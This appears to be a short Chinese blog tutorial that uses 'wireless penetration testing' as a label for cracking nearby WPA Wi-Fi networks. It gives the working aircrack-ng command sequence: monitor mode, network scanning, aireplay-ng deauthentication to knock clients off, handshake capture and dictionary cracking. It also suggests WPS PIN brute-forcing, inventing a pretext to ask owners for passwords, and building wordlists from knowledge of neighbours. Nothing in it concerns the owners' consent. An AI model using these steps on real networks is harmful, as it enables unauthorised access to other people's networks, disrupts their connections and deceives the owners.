无线渗透试的工具有很多,在windows下和linux下的工具各有千秋,因在windows下的工具基本都是图形界面,操作起来比较直观易懂,在此就不再做过多介绍,本方重点介绍在linux下的一种通用的方法。
首先讲一下现行无线渗透试的一般方法和原理。
目前无线渗透试的两种方法:1、抓握手包,跑包。2、通过WPS进行跑pin码
当然第2种方法是要求路由器开启了wps功能。并且要求路由器没有设置pin防护,其它的方法如路由器漏洞等不在此讨论范围内。
WEP方式认证的路由器已经很少了,而且这种认证方式不但非常不安全且绝对可破,不再讲解,本文只讲WPA认证方式的渗透方法。
其实最有效的取得密码的方法是直接编个理由过去问!(社工)用我的工具生成密码即可
工具链接我不敢放,不然审核不过啊,大家百度搜下弱口令来破解下,如果熟悉邻居的
可以用百度搜 “社工密码字典生成神器” 比较好用的
原理:抓到的包中有密码的密文,做暴力跑包即可。
工具:aircrack-ng工具包(kali内置),一个支持监听模式的无线网卡。
使用ifconfig wlan0 up激活你的无线网卡。
使用airmon-ng check kill结束系统中可能的干扰进程。
使用airmon-ng start wlan0开启你网卡的监听模式。并记住监听模式的名字。
第二步:监听周围wifi状态,选择要破解的无线路由器
使用airodump-ng wlan0mon开始监听
第三步:针对要要破解的wifi重新开启一个监听记录,发送断开命令,等待客户端重新连接时监听密码包。
airodump-ng -w 文件名(自己起一个名,用来保存监听到的数据) -c 监听频道 wlan0mon
打开另一个shell使用
aireplay-ng -0 1 -a 路由器的MAC地址 -c 客户端的MAC地址 wlan0mon
强制断开连 接到路由器的设备,以便在它再次连接时捕获它的认证包。
这里可以一直多用几次这个命令,只要对方断开重连就可以抓到包了
看看原来的airodump-ng的窗口是否在右上解提示有WPA handshake监听到
第四步:跑包测试加密的无线密码
aircrack-ng -w 准备好的密码字典 捕获到的数据包
关注下我
,
